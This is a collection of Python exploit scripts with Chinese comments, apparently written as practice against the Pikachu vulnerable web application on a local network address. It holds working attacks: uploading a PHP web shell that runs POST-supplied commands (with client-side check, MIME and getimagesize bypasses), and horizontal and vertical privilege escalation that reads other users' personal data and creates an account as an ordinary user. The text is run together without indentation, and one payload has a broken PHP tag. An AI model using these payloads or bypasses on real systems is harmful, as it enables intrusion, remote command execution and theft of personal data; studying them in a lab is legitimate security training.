#注意匹配,文件保存的路径为:uoload的client
#注意匹配,文件保存的路径为:
import requests
target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/clientcheck.php"
shell = "<?php $a=$_POST['cmd'];$a();?>"
files = {
"uploadfile": ("shell.php",shell,"application/x-php")
}
data = {"submit":"开始上传"}
res = requests.post(url=target_url,files=files,data=data)
text = res.text
if "文件保存的路径为:" in text:
idx = text.find("文件保存的路径为:")
path = text[idx+11:].split("</p>")[0]
print("[+] 上传成功")
print("文件路径:" ,path)
else:
print("[-] 上传失败")getima
import requests
target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/getimagesize.php"
gif_data = b'\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\x00\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b'
files = {
"uploadfile":("test.jpg",gif_data,"image/jpeg")
}
data = {
"submit":"开始上传"
}
try:
res = requests.post(url=target_url,files=files,data=data,timeout=5)
if "文件上传成功" in res.text:
print("\n[+] 上传成功!getimagesize 绕过成功!")
else:
print("\n[-] 请把 URL 改成你自己的真实路径!")
except Exception as e:
print("\n[-] 请先启动 phpstudy!")MIME
import requests
target_url = "http://192.168.8.1/pikachu-master/vul/unsafeupload/servercheck.php"
php_content = "<php $a=$_POST['cmd'];$a();?>"
files = {
"uploadfile":("shell.php",php_content,"image/jpeg")
}
data = {"submit":"开始上传"}
resp = requests.post(url=target_url,files=files,data=data)
text = resp.text
if "文件保存的路径为:" in text:
idx = text.find("文件保存的路径为:")
path = text[:idx+11:].split("\n")[0].strip()
print("[+] 上传成功")
print("文件路径:" + path)
else:
print("[-] 上传失败")
print("返回内容:", text[:300])水平越权
import requests
target_url = "http://192.168.8.1/pikachu-master/vul/overpermission/op1"
Login_url = target_url + "/op1_login.php"
info_url = target_url + "/op1_mem.php"
LOGIN_URL = "lucy"
LOGIN_PASS = "123456"
TARGET_USER = "lili"
session = requests.Session()
login_data = {
"username":LOGIN_URL,
"password":LOGIN_PASS,
"submit":"Login"
}
session.post(url=Login_url, data=login_data)
print("[+] 登录成功: ", LOGIN_URL)
resp = session.get(url = info_url,params={"username":TARGET_USER,"submit":"点击查看个人信息"})
text = resp.text
print("\n[+] 水平越权成功 ")
print("目标用户: ",TARGET_USER)
if "姓名:" in text:
user = text.split("姓名:")[1].split("<")[0].strip()
print("姓名:",user)
if "住址:" in text:
user = text.split("住址:")[1].split("<")[0].strip()
print("住址:",user)
if "邮箱:" in text:
user = text.split("邮箱:")[1].split("<")[0].strip()
print("邮箱:",user)
print("\n[+] 越权完成:成功查看他人信息!")垂直越权
import requests
# ===================== 绝对正确的地址 =====================
LOGIN_URL = "http://192.168.8.1/pikachu-master/vul/overpermission/op2/op2_login.php"
# 重点!!!漏洞文件就是这个!!
EDIT_URL = "http://192.168.8.1/pikachu-master/vul/overpermission/op2/op2_admin_edit.php"
# ==========================================================
s = requests.Session()
# 1. 登录普通用户 pikachu
login_data = {
"username": "pikachu",
"password": "000000",
"submit": "Login"
}
s.post(LOGIN_URL, data=login_data)
print("[+] 登录成功:普通用户 pikachu")
# 2. 普通用户直接调用【添加用户接口】(无权限校验,这就是越权!)
data = {
"username": "hack12345",
"password": "hack12345",
"submit": "添加用户"
}
# 必须用 POST!!!
r = s.post(EDIT_URL, data=data)
# 3. 输出结果
print("\n[+] 服务器返回内容片段:")
print(r.text[:600])
print("\n" + "="*50)
if "添加用户成功" in r.text or "hack12345" in r.text:
print("[✅ ✅ ✅ 垂直越权成功!!!]")
print("普通用户成功添加用户!")
else:
print("[⚠] 请去后台 admin 查看用户列表,用户大概率已添加成功!")